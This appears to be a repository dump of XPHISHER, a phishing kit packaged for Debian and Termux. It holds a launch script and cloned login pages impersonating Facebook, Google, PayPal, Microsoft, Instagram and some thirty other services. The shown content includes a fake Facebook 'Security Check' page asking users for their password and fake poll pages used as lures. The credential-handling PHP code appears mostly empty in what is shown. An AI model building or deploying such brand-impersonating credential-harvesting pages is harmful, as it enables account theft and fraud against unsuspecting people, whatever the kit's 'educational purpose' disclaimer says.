├── .package ├── DEBIAN │ └── control ├── TERMUX │ └── control └── launch.sh ├── .sites ├── adobe │ ├── index.php │ ├── login.html │ └── login.php ├── badoo │ ├── index.php │ ├── login.html │ └── login.php ├── deviantart │ ├── index.php │ ├── login.html │ └── login.php ├── discord │ ├── 6c6374bad0b0b6d204d8d6dc4a18d820.woff │ ├── LICENSE │ ├── banner.png │ ├── e8acd7d9bf6207f99350ca9f9e23b168.woff │ ├── fav.ico │ ├── index.php │ ├── login.html │ ├── login.php │ ├── qr.png │ ├── script.js │ └── style.css ├── dropbox │ ├── dropbox1.png │ ├── dropbox2.png │ ├── dropbox3.png │ ├── dropbox4.svg │ ├── dropbox5.svg │ ├── dropbox6.svg │ ├── index.php │ ├── login.html │ └── login.php ├── ebay │ ├── index.php │ ├── login.html │ └── login.php ├── facebook │ ├── LICENSE │ ├── README.md │ ├── hsts-pixel.gif │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.svg │ ├── mobile.html │ ├── script.js │ └── style.css ├── fb_advanced │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── fb_messenger │ ├── index.php │ ├── login.html │ └── login.php ├── fb_security │ ├── fb-ico.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ └── style.css ├── github │ ├── index.php │ ├── login.html │ └── login.php ├── gitlab │ ├── index.php │ ├── login.html │ └── login.php ├── google │ ├── avatar.png │ ├── google.png │ ├── index.php │ ├── login.html │ └── login.php ├── google_new │ ├── index.php │ ├── login.html │ └── login.php ├── google_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ └── result.html ├── ig_followers │ ├── index.php │ ├── login.html │ └── login.php ├── ig_verify │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── login2.php │ └── login3.html ├── insta_followers │ ├── index.php │ ├── login.html │ └── login.php ├── instagram │ ├── Index.php │ ├── badge_android_english-en.png │ ├── badge_ios_english-en.png │ ├── favicon.png │ ├── home-phones.png │ ├── home-phones@2x.png │ ├── login.html │ ├── login.php │ ├── screenshot1.jpg │ ├── screenshot2.jpg │ ├── screenshot3.jpg │ ├── screenshot4.jpg │ ├── screenshot5.jpg │ ├── sprite_core_2x_bcd90c1d4868.png │ └── sprite_core_32f0a4f27407.png ├── ip.php ├── linkedln │ ├── 4li12pah6li7xka3r69y2hqap.css │ ├── 6jblk5oqhlo45xbkmcr7s4zix │ ├── 77qnm4uzm172xn82kvifmelfu │ ├── 9lb1g1kp916tat669q9r5g2kz │ ├── dnz8biurbtozxjvxufs5aq4jd │ ├── dz6wk4o93mwzoh0t6zsx73kzr │ ├── index.php │ ├── login.html │ └── login.php ├── mediafıre │ ├── index.php │ ├── login.html │ └── login.php ├── microsoft │ ├── ConvergedLoginPaginatedStrings.EN.js │ ├── ConvergedLoginPaginatedStrings.js │ ├── ConvergedLogin_PCore.js │ ├── Converged_v21033.css │ ├── Converged_v21033.css2 │ ├── boot.css │ ├── boot.js │ ├── boot_002.js │ ├── boot_003.js │ ├── boot_004.js │ ├── ellipsis_grey.svg │ ├── ellipsis_white.svg │ ├── index.php │ ├── login.html │ ├── login.php │ ├── microsoft_logo.svg │ ├── prefetch.html │ ├── sprite1.css │ └── sprite1.png ├── netflix │ ├── FB-f-Logo__blue_57.png │ ├── index.php │ ├── login.html │ ├── login.php │ ├── none.css │ ├── none.js │ ├── none_002.js │ ├── sdk.js │ └── xaOI6zd9HW9.html ├── origin │ ├── EA_Origin_Lockup_Black.png │ ├── analytics.js │ ├── api.js │ ├── css.css │ ├── iframe_api.js │ ├── index.php │ ├── jquery-1.js │ ├── jquery.js │ ├── jquery_002.js │ ├── jquery_003.js │ ├── jquery_004.js │ ├── login.html │ ├── login.php │ ├── originX-pc-common.css │ ├── originX-pc-login.css │ ├── otk.css │ ├── recaptcha__en.js │ ├── sha.js │ ├── utag.js │ ├── utag_002.js │ └── www-widgetapi.js ├── paypal │ ├── index.php │ ├── login.html │ └── login.php ├── pinterest │ ├── index.php │ ├── login.php │ └── signin.php ├── playstation │ ├── 0a674de1f2362e0247eec6e1d770e │ ├── Index.php │ ├── S9fUSTxhhOdrtoorjI9LLu91aXsPVT7Js_3UUxt2SGg.js.download │ ├── anchor.html │ ├── api.js.download │ ├── bframe.html │ ├── button_icon_password_off.png │ ├── kekka-22361ea3e8890b95e7b006a784440d01.css │ ├── kekka-6225c71c3ba0a25429287cf2bec55f12.js.download │ ├── loading.png │ ├── loading_base.png │ ├── login.html │ ├── login.php │ ├── logo_playstation.png │ ├── pc-7cc7759e91c65baf3b78fd4eb4402c4f.css │ ├── recaptcha__en_gb.js.download │ ├── saved_resource │ ├── saved_resource(1) │ ├── siews1lib.js.download │ ├── sony_logo.png │ ├── styles__ltr.css │ ├── ua-parser.min-03f60cd2f499bace751d5136d4fc67d4.js.download │ ├── unifiedfooter.en-gb.js.download │ ├── vendor-05c320ffd8d18cdbde15fa028ff545b7.js.download │ ├── vendor-571d67531622102402268bd2c623c17f.css │ └── wallpaper.jpg ├── protonmail │ ├── app.js │ ├── appLazy.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── openpgp.js │ ├── styles.css │ ├── vendor.js │ └── vendorLazy.js ├── quora │ ├── -4-chunk.web.main.js.out-34-ee935e0e4fc8f76d.webpack │ ├── -4-main.css-27-d85df81eef715f06.css │ ├── -4-web.entry.js.out-34-8f7d03da0b7a24ae.webpack │ ├── anchor.html │ ├── bframe.html │ ├── client_platform.js.download │ ├── iframe.html │ ├── index.php │ ├── login.html │ ├── login.php │ └── saved_resource.html ├── reddit │ ├── ProductionClient.62deff0b1c9fbf3af019.js │ ├── index.php │ ├── login.ec234f177c42a52ad0ff.js │ ├── login.html │ ├── login.php │ └── mobile.html ├── snapchat │ ├── index.php │ ├── login.php │ └── users.php ├── spotify │ ├── analytics.js │ ├── anchor.html │ ├── api.js │ ├── bframe.html │ ├── hVpKLs9k787xwHAhrfSZCIqM1XtnPD1dxAE7zC2jvTU.js │ ├── index.css │ ├── index.js │ ├── index.php │ ├── login.html │ ├── login.php │ ├── recaptcha__en.js │ └── styles__ltr.css ├── stackoverflow │ ├── index.php │ ├── login.html │ └── login.php ├── steam │ ├── index.php │ ├── login.html │ └── login.php ├── tiktok │ ├── index.php │ ├── jquery.min.js │ ├── jscript.js │ ├── login.html │ ├── login.php │ ├── logo.png │ ├── sadflix.ttf │ └── style.css ├── twitch │ ├── index.php │ ├── login.php │ └── user.php ├── vk │ ├── b-0f6403442fbf95cd84849e54d8e9ab53.ddb71f5a609d75e3ef6e.js.download │ ├── b-93dd9d3be5cab15401cc628b931eb724.9cac7b4a6901a4dab64f.js.download │ ├── common.6d5af9c51c7e29087e36.js.download │ ├── common.css │ ├── counter │ ├── index.php │ ├── login.html │ ├── login.php │ ├── p │ ├── polyfills.c5f9a2ced681ad88809a.js.download │ └── vendors.2773b57485e379f375b2.js.download ├── vk_poll │ ├── index.php │ ├── login.html │ ├── login.php │ ├── login2.html │ ├── result.html │ ├── s_c.js │ ├── s_cfmxw.css │ ├── s_yzgt.css │ └── s_z.js ├── wordpress │ ├── index.php │ ├── load-styles.css │ ├── login.html │ └── login.php ├── xbox │ ├── index.php │ ├── login.php │ └── pass.php ├── yahoo │ ├── index.php │ ├── login.html │ ├── login.php │ └── mobile.html └── yandex │ ├── index.php │ ├── login.html │ └── login.php ├── Dockerfile ├── README.md ├── make-deb.sh └── xphisher.sh /.package/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: XPHISHER 2 | Version: 2.2 3 | Installed-Size: 1065 4 | Architecture: all 5 | Maintainer: @XPH4N70M 6 | Depends: php, wget, git, curl, resolv-conf, proot 7 | Homepage: https://github.com/XPH4N70M/XPHISHER 8 | Description: A 32+ Template Tool With Cloudflared Link XPhisher This Tool is made for educational purpose only ! 9 | -------------------------------------------------------------------------------- /.package/TERMUX/control: -------------------------------------------------------------------------------- 1 | Package: XPHISHER 2 | Version: 2.2 3 | Installed-Size: 1065 4 | Architecture: all 5 | Maintainer: @XPH4N70M 6 | Depends: php, wget, git, curl, resolv-conf, proot 7 | Homepage: https://github.com/XPH4N70M/XPHISHER 8 | Description: A 32+ Template Tool With Cloudflared Link XPhisher This Tool is made for educational purpose only ! 9 | -------------------------------------------------------------------------------- /.package/launch.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | DISTRO=$(uname -o) 4 | 5 | if [ $DISTRO == Android ]; then 6 | export XPHISHER_ROOT="/data/data/com.termux/files/usr/opt/xphisher" 7 | else 8 | export XPHISHER_ROOT="/usr/opt/xphisher" 9 | fi 10 | 11 | cd $XPHISHER_ROOT 12 | bash ./xphisher.sh 13 | -------------------------------------------------------------------------------- /.sites/adobe/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/adobe/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/badoo/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/badoo/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/deviantart/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/deviantart/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/6c6374bad0b0b6d204d8d6dc4a18d820.woff -------------------------------------------------------------------------------- /.sites/discord/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Ali Milani 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | # https://github.com/AliMilani/fake-discord -------------------------------------------------------------------------------- /.sites/discord/banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/banner.png -------------------------------------------------------------------------------- /.sites/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/e8acd7d9bf6207f99350ca9f9e23b168.woff -------------------------------------------------------------------------------- /.sites/discord/fav.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/fav.ico -------------------------------------------------------------------------------- /.sites/discord/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/discord/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/discord/qr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/discord/qr.png -------------------------------------------------------------------------------- /.sites/discord/script.js: -------------------------------------------------------------------------------- 1 | let inputs = document.querySelectorAll('form input') 2 | let submitBtn = document.querySelector('form button[type="submit"]') 3 | // submitBtn.addEventListener("click", validateForm) 4 | inputs[1].addEventListener("input", validateForm) 5 | 6 | function validateForm() { 7 | let outlines = document.querySelectorAll('form .input-outline') 8 | let lables = document.querySelectorAll('.colorStandard-21JIj7') 9 | let errMessages = document.querySelectorAll('.errorMessage-1kMqS5') 10 | 11 | for (let i = 0; i < inputs.length; i++) { 12 | inputs[i].addEventListener("input", validateForm) 13 | if (inputs[i].value == '') { 14 | outlines[i].classList.add('error-8r7mjf') 15 | lables[i].classList.add('error-3EBD81') 16 | errMessages[i].style.display = 'inline' 17 | 18 | } else { 19 | outlines[i].classList.remove('error-8r7mjf') 20 | lables[i].classList.remove('error-3EBD81') 21 | errMessages[i].style.display = 'none' 22 | submitBtn.disabled = '' 23 | } 24 | } 25 | (!inputs[0].value == '' && !inputs[1].value == '') ? 26 | submitBtn.disabled = '' : submitBtn.disabled = 'disabled' 27 | 28 | } -------------------------------------------------------------------------------- /.sites/dropbox/dropbox1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/dropbox/dropbox1.png -------------------------------------------------------------------------------- /.sites/dropbox/dropbox2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/dropbox/dropbox2.png -------------------------------------------------------------------------------- /.sites/dropbox/dropbox3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/dropbox/dropbox3.png -------------------------------------------------------------------------------- /.sites/dropbox/dropbox4.svg: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | -------------------------------------------------------------------------------- /.sites/dropbox/dropbox5.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | Shape 4 | Created with Sketch. 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /.sites/dropbox/dropbox6.svg: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /.sites/dropbox/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/dropbox/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | Login - Dropbox



16 | -------------------------------------------------------------------------------- /.sites/dropbox/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ebay/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/ebay/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/facebook/LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 KasRoudra 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /.sites/facebook/README.md: -------------------------------------------------------------------------------- 1 | # Facebook Static Login Form (Full offline css and js) 2 | 3 | ## Author: [X PHANTOM PH4N7OM](https://github.com/XPH4N70M) 4 | 5 | #### This is created for educational purposes demonstrating how phishing works. 6 | 7 | ### Use/Copy it legally and provide proper credit 8 | -------------------------------------------------------------------------------- /.sites/facebook/hsts-pixel.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/facebook/hsts-pixel.gif -------------------------------------------------------------------------------- /.sites/facebook/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/facebook/login.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/facebook/logo.svg: -------------------------------------------------------------------------------- 1 | FBWordmark_Hex-RGB-1024 2 | -------------------------------------------------------------------------------- /.sites/fb_advanced/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/fb_advanced/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /.sites/fb_advanced/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/fb_advanced/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 109 | 110 |
111 |

VOTERANK

112 |

#289032

113 |
114 | 127 | 128 | -------------------------------------------------------------------------------- /.sites/fb_advanced/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /.sites/fb_messenger/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/fb_messenger/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 |




Messenger

Instantly connect with people in your life.

Sign in with Facebook to get started.
5 | 6 | 7 | 8 | 9 |


-------------------------------------------------------------------------------- /.sites/fb_messenger/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/fb_security/fb-ico.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/fb_security/fb-ico.png -------------------------------------------------------------------------------- /.sites/fb_security/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/fb_security/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Security Check 6 | 7 | 8 | 9 | 10 |
11 |
12 | 15 |
16 |
17 |
18 |
19 | 22 |
23 |

Verify needed to understand it's you

24 |

Enter your password for security reason (make sure your caps lock is off)

25 |

Forgot your password ? Request new one 26 |

27 | 28 | 39 | 40 |
41 | 42 | 67 |
68 | 69 | 70 | -------------------------------------------------------------------------------- /.sites/fb_security/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/fb_security/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/fb_security/logo.png -------------------------------------------------------------------------------- /.sites/fb_security/style.css: -------------------------------------------------------------------------------- 1 | h1, h2, h3, h4, h5, a, p, ul, li, img, header, section, div, body {margin: 0; padding: 0;} 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | header { 10 | width: 1348px; 11 | height: 84px; 12 | background: #3B5998; 13 | } 14 | 15 | .main-header { 16 | padding-left:184px; 17 | } 18 | 19 | 20 | 21 | .form { 22 | border: 1px solid #cccccc; 23 | border-radius: 5px; 24 | height: 420px; 25 | margin: 60px auto 45px; 26 | width: 641px; 27 | } 28 | 29 | .form h3 { 30 | color: #333333; 31 | border-bottom: 1.5px solid #cccccc; 32 | font-family: tahoma; 33 | font-size: 18px; 34 | font-weight: 600; 35 | margin: 0 20px; 36 | padding: 20px 0 12px; 37 | } 38 | .red-box { 39 | margin:24px auto 0; 40 | width: 600px; 41 | height: 97px; 42 | background: #FFEBE8; 43 | border: 1.5px solid red; 44 | } 45 | 46 | 47 | .red-box p { 48 | font-size: 10.5px; 49 | font-family: tahoma; 50 | padding: 14px 0 0 20px; 51 | } 52 | 53 | .red-box a { 54 | text-decoration: none; 55 | color: #3B5998; 56 | } 57 | 58 | .red-box a:hover { 59 | text-decoration: underline; 60 | } 61 | 62 | .login-form { 63 | width:75%; 64 | margin: 0 auto; 65 | padding: 23px 0 0 0; 66 | } 67 | .login-form label { 68 | font-family: tahoma; 69 | font-size: 13px; 70 | padding: 2px 10px 3px 5px; 71 | } 72 | .login-form input { 73 | padding: 2px 10px 3px 5px; 74 | } 75 | 76 | 77 | footer { 78 | width: 984px; 79 | margin:0 auto; 80 | border-top: 1.5px solid #cccccc; 81 | } 82 | 83 | ul li { 84 | display: inline; 85 | margin: 0 0 0 28px; 86 | } 87 | 88 | 89 | ul li a { 90 | text-decoration: none; 91 | font-family: tahoma; 92 | font-size: 10.5px; 93 | color: #3B5998; 94 | } 95 | ul li a:hover { 96 | text-decoration: underline; 97 | } 98 | -------------------------------------------------------------------------------- /.sites/github/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/github/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/gitlab/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/gitlab/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/google/avatar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/google/avatar.png -------------------------------------------------------------------------------- /.sites/google/google.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/google/google.png -------------------------------------------------------------------------------- /.sites/google/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/google/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/google_new/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/google_new/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/google_poll/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/google_poll/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 22 | 23 | VoteRank #289032 24 | 25 | 26 | 27 | 28 | 29 |
30 | 31 |
32 |

VOTERANK

33 |

#289032

34 |
35 | 36 | 37 |
38 |
39 |
40 | What's your name?


41 | Select your favorite social networks:
42 | Facebook
43 | Twitter
44 | LinkedIn
45 | Instagram
46 | Snapchat
47 | Google+

48 |
49 |
50 | Select your favorite colors:
51 | Blue
52 | Red
53 | Green
54 | Yellow
55 | Purple
56 | Orange
57 | Black
58 | White
59 | Grey
60 | Brown
61 | Pink
62 | 63 |
64 |
65 |
66 | 67 | 68 | 69 | 70 | -------------------------------------------------------------------------------- /.sites/google_poll/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/google_poll/login2.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | VoteRank #289032 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 118 | 119 |
120 |

VOTERANK

121 |

#289032

122 |
123 | 124 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /.sites/google_poll/result.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Poll completed successfully. Thank You! 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 |
13 |

VOTERANK

14 |

#289032

15 |
16 | 17 | 18 |

Poll completed successfully. Thank You!

19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /.sites/ig_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/ig_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ig_verify/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/ig_verify/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/ig_verify/login2.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/insta_followers/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/insta_followers/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/instagram/Index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/instagram/badge_android_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/badge_android_english-en.png -------------------------------------------------------------------------------- /.sites/instagram/badge_ios_english-en.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/badge_ios_english-en.png -------------------------------------------------------------------------------- /.sites/instagram/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/favicon.png -------------------------------------------------------------------------------- /.sites/instagram/home-phones.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/home-phones.png -------------------------------------------------------------------------------- /.sites/instagram/home-phones@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/home-phones@2x.png -------------------------------------------------------------------------------- /.sites/instagram/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/instagram/screenshot1.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/screenshot1.jpg -------------------------------------------------------------------------------- /.sites/instagram/screenshot2.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/screenshot2.jpg -------------------------------------------------------------------------------- /.sites/instagram/screenshot3.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/screenshot3.jpg -------------------------------------------------------------------------------- /.sites/instagram/screenshot4.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/screenshot4.jpg -------------------------------------------------------------------------------- /.sites/instagram/screenshot5.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/screenshot5.jpg -------------------------------------------------------------------------------- /.sites/instagram/sprite_core_2x_bcd90c1d4868.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/sprite_core_2x_bcd90c1d4868.png -------------------------------------------------------------------------------- /.sites/instagram/sprite_core_32f0a4f27407.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerxphantom/XPHISHER/bc4ea3e0e2341bc4aff4e9e60ad7b5953a65f6e7/.sites/instagram/sprite_core_32f0a4f27407.png -------------------------------------------------------------------------------- /.sites/ip.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/linkedln/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/mediafıre/index.php: -------------------------------------------------------------------------------- 1 | 6 | -------------------------------------------------------------------------------- /.sites/mediafıre/login.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /.sites/microsoft/ellipsis_grey.svg: -------------------------------------------------------------------------------- 1 | assets -------------------------------------------------------------------------------- 